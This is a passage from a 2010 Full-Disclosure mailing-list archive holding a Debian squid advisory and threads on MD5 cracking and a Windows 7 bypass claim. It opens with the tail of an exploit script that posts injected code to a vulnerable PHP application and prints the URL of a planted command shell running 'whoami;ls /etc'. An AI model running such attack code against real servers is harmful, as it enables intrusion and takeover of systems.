wget --post-file=injection.txt $vulnerable > /dev/null
wget --post-file=code.txt $compromised > /dev/null
echo "code installed at: $1/admin/incadd_set.php?cmd=whoami;ls /etc"
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/def0163c/attachment-0001.html 

From white at debian.org  Thu Feb  4 08:46:27 2010
From: white at debian.org (Steffen Joeris)
Date: Thu,  4 Feb 2010 09:46:27 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1991-1] New squid/squid3 packages
	fix denial of service
Message-ID: <20100204084627.8678A84946E@hannah.localdomain>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1991-1                  security at debian.org
http://www.debian.org/security/                      Steffen Joeris
February 04, 2010                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : squid/squid3
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE Ids        : CVE-2009-2855 CVE-2010-0308
Debian Bug     : 534982

Two denial of service vulnerabilities have been discovered in
squid and squid3, a web proxy. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-2855

Bastian Blank discovered that it is possible to cause a denial of
service via a crafted auth header with certain comma delimiters.

CVE-2010-0308

Tomas Hoger discovered that it is possible to cause a denial of service
via invalid DNS header-only packets.


For the stable distribution (lenny), these problems have been fixed in
version 2.7.STABLE3-4.1lenny1 of the squid package and version
3.0.STABLE8-3+lenny3 of the squid3 package.

For the oldstable distribution (etch), these problems have been fixed in
version 2.6.5-6etch5 of the squid package and version 3.0.PRE5-5+etch2
of the squid3 package.

For the testing distribution (squeeze) and the unstable distribution
(sid), these problems will be fixed soon.


We recommend that you upgrade your squid/squid3 packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5.diff.gz
    Size/MD5 checksum:   274283 f35fba0ebbd63b22786d04c8775aacf6
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2.dsc
    Size/MD5 checksum:      736 afa36dab050b287f83cb9ff2f802c52c
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5.orig.tar.gz
    Size/MD5 checksum:  3061614 35cc83c17afb17c4718ffc8d0d71bcae
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2.diff.gz
    Size/MD5 checksum:    13917 b19a43d3e4fd77350b8f4f7343a3169c
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5.orig.tar.gz
    Size/MD5 checksum:  1636886 26cc918028340dc8ceb9c0c4b988d717
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5.dsc
    Size/MD5 checksum:      678 2e53013dd1d22bc98d694c4b0775a715

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/squid3/squid3-common_3.0.PRE5-5+etch2_all.deb
    Size/MD5 checksum:   245540 c4dfb7902e784ae1d3272237f744581c
  http://security.debian.org/pool/updates/main/s/squid/squid-common_2.6.5-6etch5_all.deb
    Size/MD5 checksum:   439698 69401a11436668a2e47c1886ed671d97

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_alpha.deb
    Size/MD5 checksum:    72214 14713da6c162394cedb830e077c7fd76
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_alpha.deb
    Size/MD5 checksum:    67820 240b81667c88a8d36d6a956de4a5f63c
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_alpha.deb
    Size/MD5 checksum:   887818 2189938d4adca4944f2e80b1410270ca
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_alpha.deb
    Size/MD5 checksum:   119894 0f37fae0a9c76523d4c94c910288db09
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_alpha.deb
    Size/MD5 checksum:   793752 86de0371720bd75455d4dad8680fb57e
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_alpha.deb
    Size/MD5 checksum:    88574 c0198db9fc0625a9344d8c732edcd4b3

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_amd64.deb
    Size/MD5 checksum:   117318 7d842bc07551d277ca2b9fad8a4cfd8c
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_amd64.deb
    Size/MD5 checksum:    86646 9366ef6a3699b718c2d8bfb8e2cc1c60
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_amd64.deb
    Size/MD5 checksum:   709444 b0fee816e56a72c0286b280eb1580b74

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_hppa.deb
    Size/MD5 checksum:   748582 b8c46c88df2c4cfc2616d4f072574e1d
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_hppa.deb
    Size/MD5 checksum:    88168 f81c4c96b838df6b1c2a88f6ed7d8dd9
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_hppa.deb
    Size/MD5 checksum:   929026 98f55b0471c50ceb6bb465f11dca4e03
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_hppa.deb
    Size/MD5 checksum:   118808 c020a98bd4a7da35597f9807592a5b77
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_hppa.deb
    Size/MD5 checksum:    66612 537a6daa5972353ecd0ff2c5875f62ca
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_hppa.deb
    Size/MD5 checksum:    70078 07cdb9fee89b9e117620abb860ea2932

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_i386.deb
    Size/MD5 checksum:    86030 6688fcc15664c2eb7c8326bac53188bb
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_i386.deb
    Size/MD5 checksum:    68408 e3ddb9042ba9ed6216cfd91c29629cf9
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_i386.deb
    Size/MD5 checksum:   117372 1a907bd4666d4de8298b99a6b97d8b9c
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_i386.deb
    Size/MD5 checksum:   738444 37cae352255e3185386ae267acfc4b8a
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_i386.deb
    Size/MD5 checksum:    64120 8c2487a0fc5fd988137e34e92055b9c6
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_i386.deb
    Size/MD5 checksum:   654880 d63eacb8a0dec6db6f789e40bbcbc404

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_ia64.deb
    Size/MD5 checksum:  1185350 8a83aa215863bf780a8c06816eb8db9b
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_ia64.deb
    Size/MD5 checksum:  1067332 c5c4f62d1d0a72cd59bd8008d64430b3
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_ia64.deb
    Size/MD5 checksum:    91628 52457c1d77a6ab7f847175b35edd9ec2
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_ia64.deb
    Size/MD5 checksum:    70446 e47c8714efcf53aa37857acd26a0dfe0
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_ia64.deb
    Size/MD5 checksum:   124520 353bf837181ed1d81a4d7907b1806027
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_ia64.deb
    Size/MD5 checksum:    76224 48ea58cf0b875b838bda0dc6e04636d9

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_mipsel.deb
    Size/MD5 checksum:    70130 33bdd10d64e1a569c0d31d21c9604b5a
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_mipsel.deb
    Size/MD5 checksum:   911924 2fd8416522c033b76714eb85977e4f51
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_mipsel.deb
    Size/MD5 checksum:   747638 872c0af7adc5047da5e220de021a36d4
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_mipsel.deb
    Size/MD5 checksum:   117484 0716d83d083fc20b3974a4a7b3d1a9d2
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_mipsel.deb
    Size/MD5 checksum:    87550 08e6ca7525fd9ddf2115761ba35805a1
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_mipsel.deb
    Size/MD5 checksum:    66448 a85376b26a332980b8c5d15e86bb0de8

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_s390.deb
    Size/MD5 checksum:    69942 ec54a9ef712024b20ddce6a6b4c9da1b
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_s390.deb
    Size/MD5 checksum:   116996 36b971cdf582b80a01a6943044ddece4
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_s390.deb
    Size/MD5 checksum:    66072 1a5dd4b79ff1fe8ab679b5a817ee2c39
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_s390.deb
    Size/MD5 checksum:   789672 bd1417584ed1a85dc74d290bdbafde41
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_s390.deb
    Size/MD5 checksum:   712096 3dbc4bd21a880100cf8bc235e18fd6b0
  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_s390.deb
    Size/MD5 checksum:    86864 d00892e40172a5d7911b52483e3a3001

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch5_sparc.deb
    Size/MD5 checksum:    86528 850d852613fb30370303bf1b43b82189
  http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch5_sparc.deb
    Size/MD5 checksum:   664030 1e613ae2224c5a76cab9739edfb4d97b
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.PRE5-5+etch2_sparc.deb
    Size/MD5 checksum:   754534 faef2b408b180d2b8f7520e68ae58fe4
  http://security.debian.org/pool/updates/main/s/squid3/squid3-client_3.0.PRE5-5+etch2_sparc.deb
    Size/MD5 checksum:    65092 57b792e95e8df967b3849c41779bffa4
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.PRE5-5+etch2_sparc.deb
    Size/MD5 checksum:    68932 ebb6417f10320745332702f8478a63c6
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch5_sparc.deb
    Size/MD5 checksum:   117034 363f9de6fc0d2cba1635261e3d82f744


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1.diff.gz
    Size/MD5 checksum:   304919 c9b0294c475b0d3118d25a60e8bb17d1
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1.dsc
    Size/MD5 checksum:     1165 3d00959e8a0e1b88d81a1c3bdaef1676
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3.orig.tar.gz
    Size/MD5 checksum:  1782040 a4d7608696e2b617aa5853c7d23e25b0
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3.dsc
    Size/MD5 checksum:     1193 f4e0434cbb77dca110a2c6200eff8195
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3.diff.gz
    Size/MD5 checksum:    19812 3da0e3edc7060e072da98cc1879eeb00
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8.orig.tar.gz
    Size/MD5 checksum:  2443502 b5d26e1b7e2285bb60cf4de249113722

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/squid/squid-common_2.7.STABLE3-4.1lenny1_all.deb
    Size/MD5 checksum:   493526 812524fc4efa57618ed4d1def3dcc720
  http://security.debian.org/pool/updates/main/s/squid3/squid3-common_3.0.STABLE8-3+lenny3_all.deb
    Size/MD5 checksum:   288766 cf2f0029151faa69307bac5b2c03e60b

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_alpha.deb
    Size/MD5 checksum:   835588 069c56b3eab9fc2d1d0b60e16f18e044
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_alpha.deb
    Size/MD5 checksum:    91144 6cce50f543ccdfa1d645e9c98529589c
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_alpha.deb
    Size/MD5 checksum:  1122354 932a805486aab1346bc99c582a13b495
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_alpha.deb
    Size/MD5 checksum:   121428 b467965585ddf831d06642d9ca336aae
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_alpha.deb
    Size/MD5 checksum:    95236 4f2442d0d1c00925ad6c12682749e4c1

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_amd64.deb
    Size/MD5 checksum:    88974 06f8d3a64200a3dfca38d44cc13723cf
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_amd64.deb
    Size/MD5 checksum:   118654 e7b6a9daf773f78f7009d56520632692
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_amd64.deb
    Size/MD5 checksum:  1009038 aecc1c3c7acf456ff6255065f32ad224
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_amd64.deb
    Size/MD5 checksum:   767478 9ad645e0203464391bb4139ffa786359
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_amd64.deb
    Size/MD5 checksum:    92862 0dbd022f1c8be1e09656958294db3038

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_arm.deb
    Size/MD5 checksum:   979854 09f2607cf6cf9c27f0b5425433e25cdb
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_arm.deb
    Size/MD5 checksum:   719926 aef403c0efc225598bc59346cabdf8ae
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_arm.deb
    Size/MD5 checksum:    87220 f10d2900317d1055aeaf109e8106582a
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_arm.deb
    Size/MD5 checksum:   117820 83efb7b8bc54f75dae6b44347734c52c
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_arm.deb
    Size/MD5 checksum:    90342 6ee2db36a8750ebb11cdd0f405579b82

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_armel.deb
    Size/MD5 checksum:    88332 96fa9f51626beefabf3d9998f4dfde78
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_armel.deb
    Size/MD5 checksum:   930654 409f7b3760cfab3e35f6144a5aaeb395
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_armel.deb
    Size/MD5 checksum:    91268 bd9cc31d518a33c0b92dc74fc813121e

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_hppa.deb
    Size/MD5 checksum:   120148 8226b1ad4b318dc9dff6f3ff759c0291
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_hppa.deb
    Size/MD5 checksum:    93554 83f7bb58a289b62fa5ff04b1176c6877
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_hppa.deb
    Size/MD5 checksum:    89710 bdf7da3f5621df2e99290fb946a0b5f7
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_hppa.deb
    Size/MD5 checksum:   788638 d0f6b69801fa53d4b8d4ec3283180262
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_hppa.deb
    Size/MD5 checksum:  1164016 4686f21aa46e06ee9a0d3a9912ed3339

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_i386.deb
    Size/MD5 checksum:    91664 fc3722b5fac63edf8677434a85e4bafc
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_i386.deb
    Size/MD5 checksum:   117732 ae221ec979f6984ca5ed89b76239df13
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_i386.deb
    Size/MD5 checksum:   934494 565e00e4581b326d802d2d9bf2fc4589
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_i386.deb
    Size/MD5 checksum:   688540 30387d06ef752feb274c3e3171028296
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_i386.deb
    Size/MD5 checksum:    87232 d2ff96bce1e135be075c2952800dec70

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_ia64.deb
    Size/MD5 checksum:  1494152 5610139ea6954ec8aabc5e88be72f462
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_ia64.deb
    Size/MD5 checksum:  1137372 feeb4b5da8bd0d006e79a4ab925ac77d
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_ia64.deb
    Size/MD5 checksum:    93592 03a66d299c07d5c7beb91dc84808abab
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_ia64.deb
    Size/MD5 checksum:    99674 c1a90b133a130e244ae22051d29b67dd
  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_ia64.deb
    Size/MD5 checksum:   124788 37f3396ea5ca9a7cfc7af794b13c93c9

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_mipsel.deb
    Size/MD5 checksum:    89730 570dbfd6b83c2f71bb60c9c55479b7e4
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_mipsel.deb
    Size/MD5 checksum:  1071320 6317781788f54e3641149ef359234597
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_mipsel.deb
    Size/MD5 checksum:    93314 1a41fbea1d1e0cc5af02db68c8f7d702

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_powerpc.deb
    Size/MD5 checksum:   119952 7afb45df2c2682548283dd67e11bdfb2
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_powerpc.deb
    Size/MD5 checksum:    88814 418110087d71155b3bf5d60eb02a9b1b
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_powerpc.deb
    Size/MD5 checksum:    93888 0958f0b19eb149cbe271424682ffeeaa
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_powerpc.deb
    Size/MD5 checksum:   776798 afd8a43585666d766888d61cc654df76
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_powerpc.deb
    Size/MD5 checksum:  1052470 b381bb088a9cc3ec43695b535b9e5928

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_s390.deb
    Size/MD5 checksum:    92756 508feb4ed0eccd3e035a39d8147ba35d
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_s390.deb
    Size/MD5 checksum:    89716 bf939d2ef30aff49bb11aa9b4dd0c0a0
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_s390.deb
    Size/MD5 checksum:   994974 f651aa10f49b2406791a71742b0750c9

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.7.STABLE3-4.1lenny1_sparc.deb
    Size/MD5 checksum:   118052 be5a2f58b3b6fb9c19da483fb9624621
  http://security.debian.org/pool/updates/main/s/squid3/squid3-cgi_3.0.STABLE8-3+lenny3_sparc.deb
    Size/MD5 checksum:    92582 4d7096f29ec68d99884d09429662f83a
  http://security.debian.org/pool/updates/main/s/squid/squid_2.7.STABLE3-4.1lenny1_sparc.deb
    Size/MD5 checksum:   706488 66addf3707104f1cfc1b25ab1d6e0a59
  http://security.debian.org/pool/updates/main/s/squid3/squid3_3.0.STABLE8-3+lenny3_sparc.deb
    Size/MD5 checksum:   960492 f6deac1df76e82e104b5a150660ba577
  http://security.debian.org/pool/updates/main/s/squid3/squidclient_3.0.STABLE8-3+lenny3_sparc.deb
    Size/MD5 checksum:    88824 3c23865550325a7fcd8bb4e0dd23c46f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAktqiQwACgkQ62zWxYk/rQfLYgCglEcEtiVBqI7hiuj04t8tAu2I
fGMAoLz4wQCwxcc7cU4Pgm2doX5tRG+g
=NLDc
-----END PGP SIGNATURE-----


From Eddie.McGhee at ncr.com  Thu Feb  4 12:21:46 2010
From: Eddie.McGhee at ncr.com (McGhee, Eddie)
Date: Thu, 4 Feb 2010 07:21:46 -0500
Subject: [Full-disclosure] anybody know good service for cracking md5?
In-Reply-To: <3af3d47c1002040405n32a1ef39g3c704e6a439d99c@mail.gmail.com>
References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com>
	<504.1265232402@localhost>
	<3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040405n32a1ef39g3c704e6a439d99c@mail.gmail.com>
Message-ID: 

Are you serious? People have been using rainbow tables for years mate.. and they are rather widely used.. no need to replace useful with anything, the statement was plain wrong..

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian Sciberras
Sent: 04 February 2010 12:06
To: Anders Klixbull
Cc: full-disclosure at lists.grok.org.uk; Valdis.Kletnieks at vt.edu
Subject: Re: [Full-disclosure] anybody know good service for cracking md5?

FINE. Replace "useful" with "widely popular".




On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull > wrote:
lol they have been useful for years son
just because YOU never found a use for them doesn't mean noone else has :)



________________________________
From: Christian Sciberras [mailto:uuf6429 at gmail.com]
Sent: 4. februar 2010 13:00
To: Anders Klixbull
Cc: Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk

Subject: Re: [Full-disclosure] anybody know good service for cracking md5?

Uh, in the sense that they are finally becoming actually useful...





On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull > wrote:
seems to be cropping in?
as far as know rainbow tables has been around for years...



________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian Sciberras
Sent: 3. februar 2010 23:02
To: Valdis.Kletnieks at vt.edu
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] anybody know good service for cracking md5?

Actually dictionary attacks seem to work quite well, especially for common users which typically use dictionary and/or well known passwords (such as the infamous "password").
Another idea which seems to be cropping in, is the use of hash tables with a list of known passwords rather then dictionary approach.
Personally, the hash table one is quite successful, consider that it targets password groups rather than a load of wild guesses.

Cheers.




On Wed, Feb 3, 2010 at 10:26 PM, > wrote:
On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:

> i find some sites which says that they can brute md5 hashes and WPA dumps
> for 1 or 2 days.

Given enough hardware and a specified md5 hash, one could at least
hypothetically find an input text that generated that hash.  However, that
may or may not be as useful as one thinks, as you wouldn't have control over
what the text actually *was*.  It would suck if you were trying to crack
a password, and got the one that was only 14 binary bytes long rather than
the one that was 45 printable characters long. ;)

Having said that, it would take one heck of a botnet to brute-force an MD5 has
in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would
take on the order of 10**22 years.  If all 140 million zombied computers on the
internet were trying 1 billion keys per second, that drops it down to 10**16
years or so - or about 10,000 times the universe has been around already.

I suspect they're actually doing a dictionary attack, which has a good chance
of succeeding in a day or two.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/5c4ca90b/attachment.html 

From Eddie.McGhee at ncr.com  Thu Feb  4 14:02:52 2010
From: Eddie.McGhee at ncr.com (McGhee, Eddie)
Date: Thu, 4 Feb 2010 09:02:52 -0500
Subject: [Full-disclosure] anybody know good service for cracking
	md5?	6A9-4CD
In-Reply-To: 
References: 
	
Message-ID: 

"because your paranoid,"

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Gregor Schneider
Sent: 04 February 2010 13:57
To: netinfinity
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] anybody know good service for cracking md5? 6A9-4CD

2010/2/4 netinfinity :
> And why are my reply's spam???

- beacuse of your fullquotes

- because you're hijacking a thread
--
just because your paranoid, doesn't mean they're not after you...
gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2
gpgp-key available
@ http://pgpkeys.pca.dfn.de:11371
@ http://pgp.mit.edu:11371/
skype:rc46fi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


From Thor at hammerofgod.com  Thu Feb  4 15:45:45 2010
From: Thor at hammerofgod.com (Thor (Hammer of God))
Date: Thu, 4 Feb 2010 15:45:45 +0000
Subject: [Full-disclosure] win7x64 Direct General
In-Reply-To: 
References: 
	<9B9E7EA67E1B1342B2D25F3FD1B3293003365298@BE35.exg3.exghost.com>
	
Message-ID: 

What??s with everyone calling out ??son?? all of a sudden?  As a southern bred boy, I??m used to it, but have found most other people find it very condescending and disrespectful.  And Mr. Seltzer of all people should not be referred to as ??son?? in any case.

t

From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of McGhee, Eddie
Sent: Wednesday, February 03, 2010 8:48 AM
To: Larry Seltzer; yuange; full-disclosure
Subject: Re: [Full-disclosure] win7x64 Direct General

come again now son?

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer
Sent: 03 February 2010 16:24
To: yuange; full-disclosure
Subject: Re: [Full-disclosure] win7x64 Direct General
Wow, that??s a searing indictment if I??ve ever heard one, I think.

Larry Seltzer
Contributing Editor, PC Magazine
larry_seltzer at ziffdavis.com
http://blogs.pcmag.com/securitywatch/

From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of yuange
Sent: Wednesday, February 03, 2010 11:16 AM
To: full-disclosure
Subject: [Full-disclosure] win7x64 Direct General


win7x64 Direct General
2010-02-03 23:38 2010-02-03 23:38

??????????????????????????????win7x64???????????????????????????????????????? Spend a day breaking the machine a good time to finally install win7x64, the result was universal pass to kill, I myself have had silently.
microsoft???????????????????????????????????????????????????? microsoft does not pay to spend millions of years digging me, I'm sorry I really have the versatility of this procedure.





